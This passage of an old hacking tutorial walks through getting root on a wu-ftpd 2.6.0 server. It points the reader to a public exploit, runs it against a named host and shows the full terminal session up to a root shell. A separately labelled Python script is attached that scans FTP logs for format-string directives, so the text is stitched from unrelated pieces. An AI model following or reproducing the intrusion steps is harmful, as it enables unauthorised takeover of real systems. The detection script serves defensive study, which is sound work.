From the above you can see that we FTPd to 196.1.2.3 and that 196.1.2.3
is running wu-2.6.0. We also tried logging in as "anonymous" and it was
successful too.
g) Get an exploit for this version of FTPd. Go to www.hack.co.za
(daemon/ftp/ section) and get the wuftpd2600.c exploit. View this exploit
code and you'll see that it's coded for specific OSs, one of which is
Red Hat 6.2. Let's say that lame_box.za.net is running Red Hat 6.2, to our
luck :) Then just compile this exploit, run it against lame_box.za.net
and it should give you root access (i.e. full control of the system):
----------------------------- cut here -----------------------------
root@kgb:~/# ./wuftpd2600 -t -s 0 196.1.2.3
Target: 196.1.2.3 (ftp/
Return Address: 0x08075844, AddrRetAddr: 0xbfffb028, Shellcode: 152
loggin into system..
USER ftp
331 Guest login ok, send your complete e-mail address as password.
PASS
230-Next time please use your e-mail address as your password
230- for example: joe@kgb.za.net
230 Guest login ok, access restrictions apply.
STEP 2 : Skipping, magic number already exists: [87,01:03,02:01,01:02,04]
STEP 3 : Checking if we can reach our return address by format string
STEP 4 : Ptr address test: 0xbfffb028 (if it is not 0xbfffb028 ^C me now)
STEP 5 : Sending code.. this will take about 10 seconds.
Press ^\ to leave shell
Linux lame_box.za.net 2.2.14-5.0 #1 Tue Mar 7 21:07:39 EST 2000 i686 unknown
uid=0(root) gid=0(root) egid=50(ftp) groups=50(ftp)
----------------------------- cut here -----------------------------
Bang! You have root!
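Seen from the server's side, the run above leaves a recognisable trace: a guest login followed by commands whose arguments carry printf-style directives (the exploit's own STEP 3 says it goes through a format string). The Python check below is an added example, not part of the original post; the log layout, the sample lines and the threshold of three directives are assumptions made for illustration.

```python
import re

# Constructed sample: "<time> <client-ip> <FTP command line>". All values are
# made up; the verbs are arbitrary, only the arguments matter to the check.
SAMPLE_LOG = """\
10:01:02 192.0.2.10 USER alice
10:01:03 192.0.2.10 PASS ********
10:01:05 192.0.2.10 RETR 100%discount.txt
10:02:11 198.51.100.7 USER ftp
10:02:12 198.51.100.7 PASS x@
10:02:13 198.51.100.7 STAT %08x.%08x.%08x.%08x
10:02:14 198.51.100.7 STAT %.f%.f%.f%n
10:03:40 203.0.113.5 USER anonymous
10:03:41 203.0.113.5 PASS joe@kgb.za.net
10:03:42 203.0.113.5 CWD pub
"""

# printf-style conversion: %[flags][width][.precision][length]conversion
DIRECTIVE = re.compile(r"%[-+ #0]*\d*(?:\.\d*)?(?:hh|h|ll|l)?([diouxXeEfgGcspn])")
GUEST_USERS = {"ftp", "anonymous"}
MIN_DIRECTIVES = 3  # assumed threshold: one stray "%d" in a file name is normal

def scan(log_text):
    """Return findings as (time, client, guest_login, reason, command)."""
    guest = {}      # client ip -> True if its last USER was a guest account
    findings = []
    for line in log_text.splitlines():
        parts = line.split(None, 3)
        if len(parts) < 3:
            continue                      # blank or malformed line
        when, client, verb = parts[0], parts[1], parts[2].upper()
        arg = parts[3] if len(parts) == 4 else ""
        if verb == "USER":
            guest[client] = arg.strip().lower() in GUEST_USERS
        convs = DIRECTIVE.findall(arg)
        if "n" in convs:                  # %n writes to memory: highest signal
            reason = "%n write directive"
        elif len(convs) >= MIN_DIRECTIVES:
            reason = f"{len(convs)} format directives"
        else:
            continue
        shown = "<redacted>" if verb == "PASS" else arg   # never echo passwords
        findings.append((when, client, guest.get(client, False), reason, f"{verb} {shown}"))
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

On the constructed log only the two lines from 198.51.100.7 are reported; the file name containing a single "%d" is left alone.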
Jai Shree Raam